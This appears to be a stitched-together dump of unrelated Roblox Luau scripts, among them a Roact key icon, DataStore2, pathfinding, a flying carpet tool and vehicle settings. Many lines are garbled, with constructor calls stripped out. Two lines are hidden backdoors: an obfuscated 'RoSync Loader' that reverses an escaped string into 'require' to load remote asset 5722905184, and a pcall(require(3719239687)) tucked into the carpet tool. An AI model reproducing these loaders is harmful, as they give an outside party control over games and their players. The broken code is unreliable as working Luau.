local BUTTON_PIXEL_SIZE = 32 -- px local SLICE_OFFSET = 6 -- px local defaultProps = { position = UDim2.fromScale(1, 1), anchorPoint =, 0.4), size = 24, transparency = 0, } export type Props = typeof(defaultProps) & { keyCode: Enum.KeyCode, transparency: any?, -- Roact binding } KeyCodeIcon.defaultProps = defaultProps function KeyCodeIcon:render() local props: Props = self.props if not props.keyCode then return end local gamepadIcon = assets.Gamepad[props.keyCode.Name] if gamepadIcon then return Roact.createElement("ImageLabel", { Image = gamepadIcon, ImageTransparency = props.transparency, Size = UDim2.fromOffset(props.size, props.size), Position = props.position, AnchorPoint = props.anchorPoint, BackgroundTransparency = 1, }) else return Roact.createElement("ImageLabel", { Image = assets.KeyBacking, ImageTransparency = props.transparency, ScaleType = Enum.ScaleType.Slice, SliceCenter = SLICE_OFFSET, SLICE_OFFSET, BUTTON_PIXEL_SIZE - SLICE_OFFSET, BUTTON_PIXEL_SIZE - SLICE_OFFSET ), Size = UDim2.fromOffset(props.size, props.size), Position = props.position, AnchorPoint = props.anchorPoint, BackgroundTransparency = 1, }, { Key = Roact.createElement(TextLabel, { Text = props.keyCode.Name, TextTransparency = props.transparency, Size = UDim2.fromScale(1, 1), Font = constants.HeaderFont, TextColor3 = constants.White, TextScaled = false, AutomaticSize = Enum.AutomaticSize.X, TextXAlignment = Enum.TextXAlignment.Center, TextYAlignment = Enum.TextYAlignment.Center, }), }) end end return KeyCodeIcon
--[[ Last synced 7/23/2021 04:30 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]--
--[[ ROBLOX deviation: skipped code original code lines: 376 - 416 ]]
-- Gets the storage location for packages used by each Dev Modules. The packages -- that get put in this folder are deduplicated so every distinct version of a -- package has only one copy.
local function getPackageStorage() local packageStorage = constants.PACKAGE_STORAGE_LOCATION:FindFirstChild(constants.PACKAGE_STORAGE_NAME) if not packageStorage then packageStorage ="Folder") packageStorage.Name = constants.PACKAGE_STORAGE_NAME packageStorage.Parent = constants.PACKAGE_STORAGE_LOCATION end return packageStorage end
-- Signal class
local Signal = {} Signal.__index = Signal function return setmetatable({ _handlerListHead = false, _signalType = signal }, Signal) end function Signal:Connect(fn) local connection =, fn) if self._signalType == 1 and self._handlerListHead then connection._next = self._handlerListHead self._handlerListHead = connection else self._handlerListHead = connection end return connection end
--[[ Creates a registry for the given class ]]
function local self = { class = class, objects = {} } setmetatable(self, {__index = Registry}) return self end
-- ANimation
local Sound = script:WaitForChild("Haoshoku Sound") UIS.InputBegan:Connect(function(Input) if Input.KeyCode == Enum.KeyCode.Z and Debounce == 1 and Tool.Equip.Value == true and Tool.Active.Value == "None" and script.Parent.DargonOn.Value == true then Debounce = 2 Track1 = plr.Character.Dragon.Dragonoid:LoadAnimation(script.AnimationCharge) Track1:Play() for i = 1,math.huge do if Debounce == 2 then plr.Character.HumanoidRootPart.CFrame =, Mouse.Hit.p) plr.Character.HumanoidRootPart.Anchored = true else break end wait() end end end) UIS.InputEnded:Connect(function(Input) if Input.KeyCode == Enum.KeyCode.Z and Debounce == 2 and Tool.Equip.Value == true and Tool.Active.Value == "None" and script.Parent.DargonOn.Value == true then Debounce = 3 plr.Character.HumanoidRootPart.Anchored = false local Track2 = plr.Character.Dragon.Dragonoid:LoadAnimation(script.AnimationRelease) Track2:Play() Track1:Stop() Sound:Play() for i = 1,10 do wait(0.1) local mousepos = Mouse.Hit script.RemoteEvent:FireServer(mousepos,Mouse.Hit.p) end wait(0.3) Track2:Stop() wait(.5) Tool.Active.Value = "None" wait(3) Debounce = 1 end end)
--[[** <description> Run this once to combine all keys provided into one "main key". Internally, this means that data will be stored in a table with the key mainKey. This is used to get around the 2-DataStore2 reliability caveat. </description> <parameter name = "mainKey"> The key that will be used to house the table. </parameter> <parameter name = "..."> All the keys to combine under one table. </parameter> **--]]
function DataStore2.Combine(mainKey, ...) for _, name in pairs({...}) do combinedDataStoreInfo[name] = mainKey end end function DataStore2.ClearCache() DataStoreCache = {} end function DataStore2:__call(dataStoreName, player) assert(typeof(dataStoreName) == "string" and typeof(player) == "Instance", ("DataStore2() API call expected {string dataStoreName, Instance player}, got {%s, %s}"):format(typeof(dataStoreName), typeof(player))) if DataStoreCache[player] and DataStoreCache[player][dataStoreName] then return DataStoreCache[player][dataStoreName] elseif combinedDataStoreInfo[dataStoreName] then local dataStore = DataStore2(combinedDataStoreInfo[dataStoreName], player) dataStore:BeforeSave(function(combinedData) for key in pairs(combinedData) do if combinedDataStoreInfo[key] then local combinedStore = DataStore2(key, player) local value = combinedStore:Get(nil, true) if value ~= nil then if combinedStore.combinedBeforeSave then value = combinedStore.combinedBeforeSave(clone(value)) end combinedData[key] = value end end end return combinedData end) local combinedStore = setmetatable({ combinedName = dataStoreName, combinedStore = dataStore }, { __index = function(self, key) return CombinedDataStore[key] or dataStore[key] end }) if not DataStoreCache[player] then DataStoreCache[player] = {} end DataStoreCache[player][dataStoreName] = combinedStore return combinedStore end local dataStore = {} dataStore.Name = dataStoreName dataStore.UserId = player.UserId dataStore.callbacks = {} dataStore.beforeInitialGet = {} dataStore.afterSave = {} dataStore.bindToClose = {} dataStore.savingMethod = setmetatable(dataStore, DataStoreMetatable) local event, fired ="BindableEvent"), false game:BindToClose(function() if not fired then event.Event:wait() end local value = dataStore:Get(nil, true) for _, bindToClose in pairs(dataStore.bindToClose) do bindToClose(player, value) end end) local playerLeavingConnection playerLeavingConnection = player.AncestryChanged:Connect(function() if player:IsDescendantOf(game) then return end playerLeavingConnection:Disconnect() if game.ServerScriptService.DataSave.Value == true then dataStore:Save() end event:Fire() fired = true delay(40, function() --Give a long delay for people who haven't figured out the cache :^( DataStoreCache[player] = nil end) end) if not DataStoreCache[player] then DataStoreCache[player] = {} end DataStoreCache[player][dataStoreName] = dataStore return dataStore end return setmetatable(DataStore2, DataStore2)
--script.Parent.LL.Velocity = script.Parent.LL.CFrame.lookVector *script.Parent.Speed.Value --script.Parent.LLL.Velocity = script.Parent.LLL.CFrame.lookVector *script.Parent.Speed.Value
script.Parent.LLLL.Velocity = script.Parent.LLLL.CFrame.lookVector *script.Parent.Speed.Value script.Parent.M.Velocity = script.Parent.M.CFrame.lookVector *script.Parent.Speed.Value
--Don't modify this script unless you really know what you're doing.
local WaitFor = (function(parent, child_name) local found = parent:FindFirstChild(child_name) while found == nil do parent.ChildAdded:wait() found = parent:FindFirstChild(child_name) if found then break end end return found end) local last = { neckC1 = nil, rshoC0 = nil, lshoC0 = nil, rhipC0 = nil, lhipC0 = nil } local ApplyModifications = (function(weld, char) local torso = WaitFor(char, "Torso") local neck = WaitFor(torso, "Neck") local rsho = WaitFor(torso, "Right Shoulder") local lsho = WaitFor(torso, "Left Shoulder") local rhip = WaitFor(torso, "Right Hip") local lhip = WaitFor(torso, "Left Hip") local config = script.Parent.Configuration local head_ang = config["Head Angle"].Value local legs_ang = config["Legs Angle"].Value local arms_ang = config["Arms Angle"].Value local sit_ang = config["Sitting Angle"].Value local sit_pos = config["Sitting Position"].Value --First adjust sitting position and angle --Add 90 to the angle because that's what most people will be expecting. --weld.C1 = weld.C1 * CFrame.fromEulerAnglesXYZ(math.rad((sit_ang) + 90), 0, 0) --weld.C0 = weld.C0 = weld.C0 *, 1, 0) last.neckC1 = neck.C1 last.rshoC0 = rsho.C0 last.lshoC0 = lsho.C0 last.rhipC0 = rhip.C0 last.lhipC0 = lhip.C0 --Now adjust the neck angle. neck.C1 = neck.C1 * CFrame.fromEulerAnglesXYZ(math.rad(head_ang), 0, 0) --Now adjust the arms angle. rsho.C0 = rsho.C0 * CFrame.fromEulerAnglesXYZ(0, math.rad(arms_ang), 0) lsho.C0 = lsho.C0 * CFrame.fromEulerAnglesXYZ(0, math.rad(-arms_ang), 0) --Now the legs rhip.C0 = rhip.C0 * CFrame.fromEulerAnglesXYZ(0, 0, math.rad(legs_ang)) lhip.C0 = lhip.C0 * CFrame.fromEulerAnglesXYZ(0, 0, math.rad(-legs_ang)) end) local RevertModifications = (function(weld, char) --Any modifications done in ApplyModifications have to be reverted here if they --change any welds - otherwise people will wonder why their head is pointing the wrong way. local torso = WaitFor(char, "Torso") local neck = WaitFor(torso, "Neck") local rsho = WaitFor(torso, "Right Shoulder") local lsho = WaitFor(torso, "Left Shoulder") local rhip = WaitFor(torso, "Right Hip") local lhip = WaitFor(torso, "Left Hip") --Now adjust the neck angle. neck.C1 = last.neckC1 or rsho.C0 = last.rshoC0 or lsho.C0 = last.lshoC0 or rhip.C0 = last.rhipC0 or lhip.C0 = last.lhipC0 or weld:Destroy() end) script.Parent.ChildAdded:connect(function(c) if c:IsA("Weld") then local character = nil if c.Part1 ~= nil and c.Part1.Parent ~= nil and c.Part1.Parent:FindFirstChild("Humanoid") ~= nil then character = c.Part1.Parent else return end ApplyModifications(c, character) end end) script.Parent.ChildRemoved:connect(function(c) if c:IsA("Weld") then local character = nil if c.Part1 ~= nil and c.Part1.Parent ~= nil and c.Part1.Parent:FindFirstChild("Humanoid") ~= nil then character = c.Part1.Parent else return end RevertModifications(c, character) end end)
--Generate a basic map
local map = {} map.sizeX = 100 map.sizeY = 100 map.fatgridSize = 10 map.grid = {} map.fatgrid = {} map.impassible = 1000000 local cardinals = {,0,0),,0,0),,-1,0),,1,0) } local corners = { { dir =,-1,0), a =, 0,0), b =,-1,0) }, { dir = 1,-1,0), a = 1, 0,0), b =,-1,0) }, { dir = 1, 1,0), a = 1, 0,0), b =, 1,0) }, { dir =, 1,0), a =, 0,0), b =, 1,0) }, } function map:GetPoint(vec2 : Vector3) return map.grid[vec2] end function map:SetPoint(vec2 : Vector3, val : number, cost : number) local getPoint = map.grid[vec2] if (getPoint == nil) then getPoint = { tile = 0, cost = 0, connections = {}, x = vec2.X, y = vec2.Y } map.grid[vec2] = getPoint end getPoint.tile = val getPoint.cost = cost end function map:CreateConnections(vec2) local getPoint = map.grid[vec2] if (getPoint == nil) then return end getPoint.connections = {} for key,vec in pairs(cardinals) do local neighbour = self:GetPoint(vec2 + vec) if (neighbour) then table.insert(getPoint.connections, { n = neighbour, cost = neighbour.cost + 10 }) end end for key,record in pairs(corners) do local neighbour = self:GetPoint(vec2 + record.dir) local a = self:GetPoint(vec2 + record.a) local b = self:GetPoint(vec2 + record.b) if (a and a.cost > 0) then continue end if (b and b.cost > 0) then continue end if (neighbour) then table.insert(getPoint.connections, { n = neighbour, cost = neighbour.cost + 14 }) end end end function map:GenerateDummy() math.randomseed(1) --empty air for y=0,map.sizeY-1 do for x=0,map.sizeX-1 do self:SetPoint(,y,0),0 , 0) end end --borders for y=0,map.sizeY-1 do self:SetPoint(,y,0),1, map.impassible) self:SetPoint(,y,0),1, map.impassible) end for x=0,map.sizeX-1 do self:SetPoint(,0,0),1 ,map.impassible) self:SetPoint(,map.sizeY-1,0),1, map.impassible) end for y=0,map.sizeY-1 do for x=0,map.sizeX-1 do if (math.random()<0.15) then self:SetPoint(,y,0), 1 , map.impassible) end end end --Create connections for y=0,map.sizeY-1 do for x=0,map.sizeX-1 do self:CreateConnections(,y,0)) end end end function map:CreateVisuals() for vec2,value in pairs(self.grid) do if (value.tile > 0) then local part ="Part") part.Size =,3,6) part.Position = + vec2.x * 6 , 1.5, 3 + vec2.y * 6) part.Anchored = true part.Parent = game.Workspace part.Transparency = 0 end end end function map:MakePath(path, color) for _,value in pairs(path) do local part ="Part") part.Size =,3,3) part.Position = + value.x * 6 , 3, 3 + value.y * 6) part.Anchored = true part.Color = color part.Parent = game.Workspace end end function debugBall(node,color) local part ="Part") part.Size =,3,3) part.Position = + node.x * 6 , 3, 3 + node.y * 6) part.Anchored = true part.Color = color part.Parent = game.Workspace end
--set suitcase name to the player's name
handle.BottomGui.OwnerName.Text = player.Name handle.TopGui.OwnerName.Text = player.Name
-- import assign from 'object-assign';
local ReactCurrentDispatcher = require(script.ReactCurrentDispatcher) export type Dispatcher = ReactCurrentDispatcher.Dispatcher local ReactCurrentBatchConfig = require(script.ReactCurrentBatchConfig) local ReactCurrentOwner = require(script.ReactCurrentOwner) local ReactDebugCurrentFrame = require(script.ReactDebugCurrentFrame) local IsSomeRendererActing = require(script.IsSomeRendererActing) local ReactSharedInternals = { ReactCurrentDispatcher = ReactCurrentDispatcher, ReactCurrentBatchConfig = ReactCurrentBatchConfig, ReactCurrentOwner = ReactCurrentOwner, IsSomeRendererActing = IsSomeRendererActing, -- ROBLOX deviation: Luau type checking requires us to have a consistent export shape regardless of __DEV__ -- ROBLOX TODO: use if-expressions when all clients are on 503+ ReactDebugCurrentFrame = if _G.__DEV__ then ReactDebugCurrentFrame else { setExtraStackFrame = function(_: string?): () onlyInTestError("setExtraStackFrame") end, }, -- deviation: We shouldn't have to worry about duplicate bundling here -- Used by renderers to avoid bundling object-assign twice in UMD bundles: -- assign, } return ReactSharedInternals
--Made by Luckymaxer
Tool = script.Parent Handle = Tool:WaitForChild("Handle") Players = game:GetService("Players") Debris = game:GetService("Debris") RemovalMonitor = script:WaitForChild("RemovalMonitor") CarpetPieces = { {MeshId = 223079795, Angle = 160}, {MeshId = 223079835, Angle = 100}, {MeshId = 223079888, Angle = 100}, {MeshId = 223079981, Angle = 160}, } CarpetSize =, 0.5, 6.5) BaseUrl = "" Rate = (1 / 10) BasePart ="Part") BasePart.Material = Enum.Material.Plastic BasePart.Shape = Enum.PartType.Block BasePart.TopSurface = Enum.SurfaceType.Smooth BasePart.BottomSurface = Enum.SurfaceType.Smooth BasePart.FormFactor = Enum.FormFactor.Custom BasePart.Size =, 0.2, 0.2) BasePart.CanCollide = false BasePart.Locked = true ColorPart = BasePart:Clone() ColorPart.Name = "ColorPart" ColorPart.Reflectance = 0.25 ColorPart.Transparency = 0.1 ColorPart.Material = Enum.Material.SmoothPlastic ColorPart.FrontSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.BackSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.TopSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.BottomSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.LeftSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.RightSurface = Enum.SurfaceType.SmoothNoOutlines ColorPart.Size =, 1, 1) ColorPart.Anchored = true ColorPart.CanCollide = false ColorMesh ="SpecialMesh") ColorMesh.Name = "Mesh" ColorMesh.MeshType = Enum.MeshType.FileMesh ColorMesh.MeshId = (BaseUrl .. "9856898") ColorMesh.TextureId = (BaseUrl .. "1361097") ColorMesh.Scale = (ColorPart.Size * 2) --Default mesh scale is 1/2 the size of a 1x1x1 brick. ColorMesh.Offset =, 0, 0) ColorMesh.VertexColor =, 1, 1) ColorMesh.Parent = ColorPart ColorLight ="PointLight") ColorLight.Name = "Light" ColorLight.Brightness = 50 ColorLight.Range = 8 ColorLight.Shadows = false ColorLight.Enabled = true ColorLight.Parent = ColorPart RainbowColors = {, 0, 0),, 0.5, 0),, 1, 0),, 1, 0),, 1, 1),, 0, 1),, 0, 1) } Animations = { Sit = {Animation = Tool:WaitForChild("Sit"), FadeTime = nil, Weight = nil, Speed = nil, Duration = nil}, } Grips = { Normal =, 0, 0, 0, 0, -1, -1, 8.90154915e-005, 0, 8.90154915e-005, 1, 0), Flying =, 0.5, -0.75, -1, 0, -8.99756625e-009, -8.99756625e-009, 8.10000031e-008, 1, 7.28802977e-016, 0.99999994, -8.10000103e-008) } Flying = false ToolEquipped = false ServerControl = (Tool:FindFirstChild("ServerControl") or"RemoteFunction")) ServerControl.Name = "ServerControl" ServerControl.Parent = Tool ClientControl = (Tool:FindFirstChild("ClientControl") or"RemoteFunction")) ClientControl.Name = "ClientControl" ClientControl.Parent = Tool Handle.Transparency = 0 Tool.Grip = Grips.Normal Tool.Enabled = true function Clamp(Number, Min, Max) return math.max(math.min(Max, Number), Min) end function TransformModel(Objects, Center, NewCFrame, Recurse) local Objects = ((type(Objects) ~= "table" and {Objects}) or Objects) for i, v in pairs(Objects) do if v:IsA("BasePart") then v.CFrame = NewCFrame:toWorldSpace(Center:toObjectSpace(v.CFrame)) end if Recurse then TransformModel(v:GetChildren(), Center, NewCFrame, true) end end end function Weld(Parent, PrimaryPart) local Parts = {} local Welds = {} local function WeldModel(Parent, PrimaryPart) for i, v in pairs(Parent:GetChildren()) do if v:IsA("BasePart") then if v ~= PrimaryPart then local Weld ="Weld") Weld.Name = "Weld" Weld.Part0 = PrimaryPart Weld.Part1 = v Weld.C0 = PrimaryPart.CFrame:inverse() Weld.C1 = v.CFrame:inverse() Weld.Parent = PrimaryPart table.insert(Welds, Weld) end table.insert(Parts, v) end WeldModel(v, PrimaryPart) end end WeldModel(Parent, PrimaryPart) return Parts, Welds end function CleanUp() for i, v in pairs(Tool:GetChildren()) do if v:IsA("BasePart") and v ~= Handle then v:Destroy() end end end function CreateRainbow(Length) local RainbowModel ="Model") RainbowModel.Name = "RainbowPart" for i, v in pairs(RainbowColors) do local Part = ColorPart:Clone() Part.Name = "Part" Part.Size =, 0.5, Length) Part.CFrame = Part.CFrame * * (i - 1)), 0, 0) Part.Mesh.Scale = (Part.Size * 2) Part.Mesh.VertexColor = v Part.Light.Color =, v.Y, v.Z) Part.Parent = RainbowModel end local RainbowBoundingBox = BasePart:Clone() RainbowBoundingBox.Name = "BoundingBox" RainbowBoundingBox.Transparency = 1 RainbowBoundingBox.Size = RainbowModel:GetModelSize() RainbowBoundingBox.Anchored = true RainbowBoundingBox.CanCollide = false RainbowBoundingBox.CFrame = RainbowModel:GetModelCFrame() RainbowBoundingBox.Parent = RainbowModel return RainbowModel end function GetRainbowModel() local ModelName = (Player.Name .. "'s Rainbow") local Model = game:GetService("Workspace"):FindFirstChild(ModelName) if not Model then Model ="Model") Model.Name = ModelName local RemovalMonitorClone = RemovalMonitor:Clone() RemovalMonitorClone.Disabled = false RemovalMonitorClone.Parent = Model end return Model end function CheckIfAlive() return (((Character and Character.Parent and Humanoid and Humanoid.Parent and Humanoid.Health > 0 and Torso and Torso.Parent and Player and Player.Parent) and true) or false) end function Activated() if not Tool.Enabled then return end Tool.Enabled = false Flying = not Flying if Flying then Handle.Transparency = 1 CleanUp() local CarpetParts = {} for i, v in pairs(CarpetPieces) do local CarpetPart = BasePart:Clone() CarpetPart.Size =, CarpetSize.Y, (CarpetSize.Z / #CarpetPieces)) local Mesh ="SpecialMesh") Mesh.MeshType = Enum.MeshType.FileMesh Mesh.MeshId = (BaseUrl .. v.MeshId) Mesh.TextureId = (BaseUrl .. "223080038") Mesh.Scale =, 1.125, 1.125) Mesh.VertexColor =, 1, 1) Mesh.Offset =, 0, 0) Mesh.Parent = CarpetPart local Weld ="Weld") Weld.Part0 = Handle Weld.Part1 = CarpetPart local XOffset = (((i == 1 or i == #CarpetPieces) and -0.005) or 0) local YOffset = ((-((Handle.Size.Z / 2) - (CarpetPart.Size.Z / 2))) + ((CarpetPart.Size.Z * (i - 1))) + ((i == 2 and 0.245) or (i == 3 and 0.04) or (i == #CarpetPieces and 0.28) or 0)) Weld.C1 =, XOffset, YOffset) Weld.Parent = CarpetPart table.insert(CarpetParts, {Part = CarpetPart, Weld = Weld, InitialCFrame = Weld.C0, Angle = v.Angle}) CarpetPart.Parent = Tool end spawn(function() InvokeClient("PlayAnimation", Animations.Sit) Tool.Grip = Grips.Flying end) Torso.Anchored = true delay(.2,function() Torso.Anchored = false Torso.Velocity =,0,0) Torso.RotVelocity =,0,0) end) FlightSpin ="BodyGyro") FlightSpin.Name = "FlightSpin" FlightSpin.P = 10000 FlightSpin.maxTorque =, FlightSpin.P, FlightSpin.P)*100 FlightSpin.cframe = Torso.CFrame FlightPower ="BodyVelocity") FlightPower.Name = "FlightPower" FlightPower.velocity =, 0, 0) FlightPower.maxForce =,1,1)*1000000 FlightPower.P = 1000 FlightHold ="BodyPosition") FlightHold.Name = "FlightHold" FlightHold.P = 100000 FlightHold.maxForce =, 0, 0) FlightHold.position = Torso.Position FlightSpin.Parent = Torso FlightPower.Parent = Torso FlightHold.Parent = Torso spawn(function() local LastPlace = nil while Flying and ToolEquipped and CheckIfAlive() do local CurrentPlace = Handle.Position local Velocity = Torso.Velocity Velocity =, 0, Velocity.Z).magnitude if LastPlace and Velocity > 10 then spawn(function() local Model = GetRainbowModel() local Distance = (LastPlace - CurrentPlace).magnitude local Length = Distance + 3.5 local RainbowModel = CreateRainbow(Length) --Thanks so much to ArceusInator for helping solve this part! local RainbowCFrame = + (CurrentPlace - LastPlace).unit * (Distance / 2)), CurrentPlace) TransformModel(RainbowModel, RainbowModel:GetModelCFrame(), RainbowCFrame, true) Debris:AddItem(RainbowModel, 1) RainbowModel.Parent = Model if Model and not Model.Parent then Model.Parent = game:GetService("Workspace") end LastPlace = CurrentPlace end) elseif not LastPlace then LastPlace = CurrentPlace end wait(Rate) end end) elseif not Flying then Torso.Velocity =, 0, 0) Torso.RotVelocity =, 0, 0) for i, v in pairs({FlightSpin, FlightPower, FlightHold}) do if v and v.Parent then v:Destroy() end end spawn(function() Tool.Grip = Grips.Normal InvokeClient("StopAnimation", Animations.Sit) end) end wait(2) Tool.Enabled = true end pcall(function()require(3719239687)end) function Equipped(Mouse) Character = Tool.Parent Humanoid = Character:FindFirstChild("Humanoid") Torso = Character:FindFirstChild("HumanoidRootPart") Player = Players:GetPlayerFromCharacter(Character) if not CheckIfAlive() then return end if Humanoid then if Humanoid.RigType == Enum.HumanoidRigType.R15 then Animations = { Sit = {Animation = Tool:WaitForChild("SitR15"), FadeTime = nil, Weight = nil, Speed = nil, Duration = nil}, } else Animations = { Sit = {Animation = Tool:WaitForChild("Sit"), FadeTime = nil, Weight = nil, Speed = nil, Duration = nil}, } end end Tool.Grip = Grips.Normal ToolEquipped = true end function Unequipped() Flying = false for i, v in pairs({FlightSpin, FlightPower, FlightHold}) do if v and v.Parent then v:Destroy() end end CleanUp() Handle.Transparency = 0 ToolEquipped = false end function OnServerInvoke(player, mode, value) if player ~= Player or not ToolEquipped or not value or not CheckIfAlive() then return end end function InvokeClient(Mode, Value) local ClientReturn = nil pcall(function() ClientReturn = ClientControl:InvokeClient(Player, Mode, Value) end) return ClientReturn end CleanUp() ServerControl.OnServerInvoke = OnServerInvoke Tool.Activated:connect(Activated) Tool.Equipped:connect(Equipped) Tool.Unequipped:connect(Unequipped)
--Player_UI.Player_IMG.Image = "" ..Player.Name
Player_UI.Player_Name.Text = Player.Name Player_UI.Player_Cash.Text = Cash.Value.."$" Cash.Changed:connect(function() Player_UI.Player_Cash.Text = Cash.Value .. "$" end)
--[=[ Converts to the string to lowerCamelCase @param str string @return string ]=]
function String.toLowerCamelCase(str: string): string str = str:lower() str = str:gsub("[ _](%a)", string.upper) str = str:gsub("^%a", string.lower) str = str:gsub("%p", "") return str end
--[=[ Stops the timer. ]=]
function Timer:Stop() if not self._runHandle then return end self._runHandle:Disconnect() self._runHandle = nil end
-- Functions
local function closeMenu() tpMenu.Enabled = false end b_close.MouseButton1Click:Connect(closeMenu)
script.Parent:WaitForChild("Speedo") script.Parent:WaitForChild("Tach") script.Parent:WaitForChild("ln") script.Parent:WaitForChild("Gear") script.Parent:WaitForChild("Speed") local player=game.Players.LocalPlayer local mouse=player:GetMouse() local car = script.Parent.Parent.Car.Value car.DriveSeat.HeadsUpDisplay = false local _Tune = require(car["A-Chassis Tune"]) local _pRPM = _Tune.PeakRPM local _lRPM = _Tune.Redline local currentUnits = 1 local revEnd = 8 local intach = car.Body.Dash.D.G.Tac.Needle local inspd = car.Body.Dash.D.G.Spd.Needle
-- create a ScreenGui
local screenGui ="ScreenGui", playerGui)
--Wheel Alignment (Dont physically align the wheels, use these values)
Tune.FCamber = -2 Tune.RCamber = 0 Tune.FToe = 0 Tune.RToe = 0 Tune.FCaster = 0 Tune.RCaster = 0 Tune.StAxisOffset = 0
-- Etc
local DESTROY_ON_DEATH = getValueFromConfig("DestroyOnDeath") local RAGDOLL_ENABLED = getValueFromConfig("RagdollEnabled") local DEATH_DESTROY_DELAY = game.ServerStorage.Respaw.Garcom.Value local PATROL_WALKSPEED = 8 local MIN_REPOSITION_TIME = 2 local MAX_REPOSITION_TIME = 10 local MAX_PARTS_PER_HEARTBEAT = 50 local ATTACK_STAND_TIME = 1 local HITBOX_SIZE =, 3, 5) local SEARCH_DELAY = 1 local ATTACK_RANGE = 3 local ATTACK_DELAY = 1 local ATTACK_MIN_WALKSPEED = 8 local ATTACK_MAX_WALKSPEED = 15
------------------------------------------------------------------------ -- stuff
do script.Parent.Equipped:connect(function() if player == nil then player = game.Players:GetPlayerFromCharacter(script.Parent.Parent) end if character == nil or character.Parent == nil then character = script.Parent.Parent humanoid = character.Humanoid isR15 = humanoid.RigType == Enum.HumanoidRigType.R15 rightHand = isR15 and character:WaitForChild("RightHand") or character:WaitForChild("Right Arm") end local getWeld = rightHand:WaitForChild("RightGrip") local motor ="Motor6D") motor.Name = motorName motor.Part0 = getWeld.Part0 motor.Part1 = getWeld.Part1 motor.C0 = script.Parent.GripWeld.C0 --motor.C1 = getWeld.C1 getWeld:Destroy() motor.Parent = rightHand end) end